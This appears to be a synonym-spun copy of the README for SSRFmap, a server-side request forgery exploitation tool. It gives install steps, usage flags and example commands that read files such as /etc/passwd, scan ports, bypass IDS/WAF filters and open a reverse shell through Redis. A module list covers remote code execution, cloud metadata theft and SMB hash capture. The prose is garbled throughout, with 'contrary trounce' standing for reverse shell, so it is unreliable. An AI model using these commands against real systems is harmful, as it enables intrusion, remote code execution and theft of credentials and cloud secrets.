Ssrfmap - Automatic Ssrf Fuzzer In Addition To Exploitation Tool


SSRF are frequently used to leverage actions on other services, this framework aims to let on in addition to exploit these services easily. SSRFmap takes a Burp asking file every bit input in addition to a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability inwards which an assaulter forces a server to perform requests on their behalf.

Guide / RTFM
Basic install from the Github repository.
git clone https://github.com/swisskyrepo/SSRFmap cd SSRFmap/ python3 ssrfmap.py  usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]  optional arguments:   -h, --help     exhibit this assistance message in addition to teach out   -r REQFILE     SSRF Request file   -p PARAM       SSRF Parameter to target   -m MODULES     SSRF Modules to enable   -l HANDLER     Start an handler for a contrary trounce   --lhost LHOST  LHOST contrary trounce   --lport LPORT  LPORT contrary trounce   --level [LEVEL]  Level of attempt to perform (1-5, default: 1)
The default agency to purpose this script is the following.
# Launch a portscan on localhost in addition to read default files python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan  # Triggering a contrary trounce on a Redis python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242  # -l practise a listener for contrary trounce on the specified port # --lhost in addition to --lport function similar inwards Metasploit, these values are used to practise a contrary trounce payload # --level : mightiness to tweak payloads inwards monastic say to bypass simply about IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
H5N1 quick agency to attempt the framework tin hold out done amongst data/example.py SSRF service.
FLASK_APP=data/example.py flask run & python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules
The next modules are already implemented in addition to tin hold out used amongst the -m argument.
Name Description
fastcgi FastCGI RCE
redis Redis RCE
github Github Enterprise RCE < 2.8.7
zaddix Zaddix RCE
mysql MySQL Command execution
docker Docker Infoleaks via API
smtp SMTP shipping mail
portscan Scan ports for the host
networkscan HTTP Ping sweep over the network
readfiles Read files such every bit /etc/passwd
alibaba Read files from the provider (e.g: meta-data, user-data)
aws Read files from the provider (e.g: meta-data, user-data)
digitalocean Read files from the provider (e.g: meta-data, user-data)
socksproxy SOCKS4 Proxy
smbhash Force an SMB authentication via a UNC Path

Inspired by